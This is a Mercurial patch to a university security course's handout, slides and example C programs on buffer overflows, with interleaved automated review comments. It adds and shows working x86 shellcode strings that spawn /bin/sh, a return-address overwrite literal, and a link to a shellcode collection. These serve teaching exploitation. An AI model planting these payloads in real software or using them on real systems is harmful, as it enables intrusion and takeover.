# HG changeset patch # User Christian Urban # Date 1444302490 -3600 # Node ID f05368d007dddbdf0312c397a82d108528512bf4 # Parent 6d552ef3b43544eecc8116f4fbc2390a98d0e371 updated diff -r 6d552ef3b435 -r f05368d007dd handouts/ho03.pdf Binary file handouts/ho03.pdf has changed diff -r 6d552ef3b435 -r f05368d007dd handouts/ho03.tex --- a/handouts/ho03.tex Wed Oct 07 18:03:32 2015 +0100 +++ b/handouts/ho03.tex Thu Oct 08 12:08:10 2015 +0100 @@ -426,20 +426,22 @@ \lstinputlisting[language=C,numbers=none]{../progs/shell.c} -\noindent Once compiled, we can use the debugger to obtain -the machine code, or even the ready-made encoding as character +\noindent Once compiled, we can use the debugger to obtain the +machine code, or even get the ready-made encoding as character sequence. +\lstinputlisting[language=C,numbers=none]{../progs/o2.c} + While not too difficult, obtaining this string is not entirely trivial using \pcode{gdb}. Remember the functions in C that copy or fill buffers work such that they copy everything until the zero byte is reached. Unfortunately the ``vanilla'' output -from the debugger for the shell-program above will contain -such zero bytes. So a post-processing phase is needed to -rewrite the machine code in a way that it does not contain any -zero bytes. This is like some works of literature that have -been written so that the letter e, for example, is avoided. -The technical term for such a literature work is +from the debugger for the shell-program above contains such +zero bytes. So a post-processing phase is needed to rewrite +the machine code in a way that it does not contain any zero +bytes. This is like some works of literature that have been +written so that the letter e, for example, is avoided. The +technical term for such a literature work is \emph{lipogram}.\footnote{The most famous example of a lipogram is a 50,000 words novel titled Gadsby, see \url{https://archive.org/details/Gadsby}, which avoids the 
@@ -531,7 +533,10 @@ \begin{figure}[p] \lstinputlisting[language=C]{../progs/C3.c} \caption{Overwriting a buffer with a string containing a -payload.\label{C3}} +payload. Lines 14 and 15 write the address of the buffer +into \pcode{large\_string}. The payload is copied in +Lines 17 and 18. Line 20 copies the (too large) string +into the buffer.\label{C3}} \end{figure} By the way you might naw have the question how do attackers @@ -808,6 +813,8 @@ \texttt{n}, the number can be omitted \item \texttt{disassemble fun-name} -- show the assembly code of a function +\item \texttt{info registers} -- prints out the current +content of all registers \item \texttt{run args} -- starts the program, potential arguments can be given \item \texttt{(b)reak line-number} -- sets break point @@ -817,6 +824,7 @@ from address \pcode{addr}, the address could be \code{$esp} for looking at the content of the stack \item \texttt{x/nxb addr} -- prints out \texttt{n} bytes +\item \texttt{q} -- quits the debugger \end{itemize} diff -r 6d552ef3b435 -r f05368d007dd progs/C0.c --- a/progs/C0.c Wed Oct 07 18:03:32 2015 +0100 +++ b/progs/C0.c Thu Oct 08 12:08:10 2015 +0100 @@ -13,7 +13,6 @@ int main (int argc, char **argv) { - foo("my string is too long !!!!!"); - //foo("my string is too long !!!!! \x15\xcd\x5d\x07"); + foo("my string is too long !!!!! "); return 0; } diff -r 6d552ef3b435 -r f05368d007dd progs/C3.c --- a/progs/C3.c Wed Oct 07 18:03:32 2015 +0100 +++ b/progs/C3.c Thu Oct 08 12:08:10 2015 +0100 @@ -3,6 +3,7 @@ "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh"; + char large_string[128]; void main() { diff -r 6d552ef3b435 -r f05368d007dd progs/README --- a/progs/README Wed Oct 07 18:03:32 2015 +0100 +++ b/progs/README Thu Oct 08 12:08:10 2015 +0100 
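Review bot: The replacement literal `foo("my string is too long !!!!! ");` in progs/C0.c ends in a trailing space that the listing does not make visible, yet it changes the string length by one relative to the line it replaces. The README hunk in this same commit shows the same text with four more bytes appended, so presumably the space is kept deliberately so that the two strings differ only by that suffix; a comment would stop the next editor from "cleaning" it away, e.g. `foo("my string is too long !!!!! "); /* trailing space is deliberate, see progs/README */`. The `argc`/`argv` parameters of `main` are unused in this hunk, so `int main(void)` would also be the quieter signature, though that line is not part of the change.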
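Review bot: The new `char large_string[128];` in progs/C3.c is a file-scope, non-`static`, writable array sized by a bare magic number; `128` presumably has to agree with the length used when the string is filled and copied in `main`, whose body continues past the end of this hunk, so a named constant such as `enum { LARGE_STRING_LEN = 128 };` or at least a comment tying the two together would make that coupling visible. Inserting a line here also renumbers the file, and the caption added to handouts/ho03.tex in this same commit refers to Lines 14, 15, 17, 18 and 20 of C3.c by number; a one-line comment such as `/* the caption in handouts/ho03.tex cites line numbers of this file; keep the layout stable */` would warn whoever next edits the file. The context line `void main()` is not standard C and `int main(void)` is the portable form, but that line is outside the change.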
@@ -23,6 +23,8 @@ Add the bigger string and the long is printed out differently. +foo("my string is too long !!!!! \x15\xcd\x5d\x07"); + C1.c ==== diff -r 6d552ef3b435 -r f05368d007dd progs/args3 --- a/progs/args3 Wed Oct 07 18:03:32 2015 +0100 +++ b/progs/args3 Thu Oct 08 12:08:10 2015 +0100 @@ -5,7 +5,8 @@ # cannot contain any \x00) -shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" +shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62 + \x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" # 24 bytes of shellcode diff -r 6d552ef3b435 -r f05368d007dd progs/o1.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/progs/o1.c Thu Oct 08 12:08:10 2015 +0100 @@ -0,0 +1,5 @@ +char shellcode[] = + "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" + "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" + "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" + "\xff\xff/bin/sh"; \ No newline at end of file diff -r 6d552ef3b435 -r f05368d007dd progs/o2.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/progs/o2.c Thu Oct 08 12:08:10 2015 +0100 @@ -0,0 +1,5 @@ +char shellcode[] = + "\x55\x89\xe5\x83\xec\x14\xc7\x45\xf8\xc0\x84\x04" + "\x08\xc7\x45\xfc\x00\x00\x00\x00\x00\x8d\x55\xf8" + "\x89\x54\x24\x04\x89\x04\x34\xe8\x02\xff\xff\xff" + "\xc9\xc3"; diff -r 6d552ef3b435 -r f05368d007dd slides/slides03.pdf Binary file slides/slides03.pdf has changed diff -r 6d552ef3b435 -r f05368d007dd slides/slides03.tex --- a/slides/slides03.tex Wed Oct 07 18:03:32 2015 +0100 +++ b/slides/slides03.tex Thu Oct 08 12:08:10 2015 +0100 @@ -331,7 +331,7 @@ \frametitle{Starting a Shell} \small -\lstinputlisting[language=C,numbers=none,xleftmargin=-6mm]{../progs/o1.c} +\lstinputlisting[language=C,numbers=none,xleftmargin=-6mm]{../progs/o2.c} \begin{textblock}{7}(5,7.5) \begin{bubble}[7cm] 
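Review bot: The reflowed assignment in progs/args3 no longer has the value its own comment describes: inside a double-quoted shell string the line break and the leading blanks of the continuation line are literal characters, so the variable now carries an embedded newline plus indentation, and the `# 24 bytes of shellcode` comment that follows it is inaccurate. If the wrap is only there to fit the listing, close the quote before the break and reopen it on the next line, `shellcode="\x31…\x62"\` followed by `"\x69…\x80"`, since adjacent quoted words concatenate and a backslash-newline outside quotes is removed; the previous single-line form was the correct one. Whichever form is kept, the byte-count comment should be re-checked against it.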
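Review bot: progs/o1.c is added without a trailing newline (the `\ No newline at end of file` marker), which every later diff of the file will flag and which some tools treat as an incomplete last line; ending the file with a newline costs nothing. The array appears to be a verbatim copy of the one already at the top of progs/C3.c, split out so slides03.tex can include it on its own; a leading comment such as `/* excerpt of progs/C3.c for slides03.tex; keep the two copies in sync */` would record that the duplicates must not drift apart. The same comment-less shape applies to the new progs/o2.c.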
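Review bot: progs/o2.c gives no hint of its purpose, although the handout hunk in this commit appears to include it precisely because its `\x00` bytes show what the unprocessed debugger output looks like in contrast to o1.c; read on its own, the file looks like a drop-in sibling of o1.c. A header line such as `/* raw encoding as read from the debugger; contains zero bytes, see the lipogram discussion in handouts/ho03.tex */` would make the intent self-describing. The array is also neither `static` nor `const`, which matters little for a listing-only file but deserves a line if these files are ever compiled.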
@@ -361,6 +361,24 @@ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +\begin{frame}[t] +\frametitle{String from the Web} + +{\small +\lstinputlisting[language=C,numbers=none,xleftmargin=-6mm]{../progs/o1.c}} +\bigskip\bigskip + +\noindent +More ``interesting'' shell programs can be found at + +\begin{center} +\url{http://shellblade.net/shellcode.html} +\end{center} + +\end{frame} +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% + +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \begin{frame}[c] \frametitle{Overflow.c} \mbox{}\\[-10mm]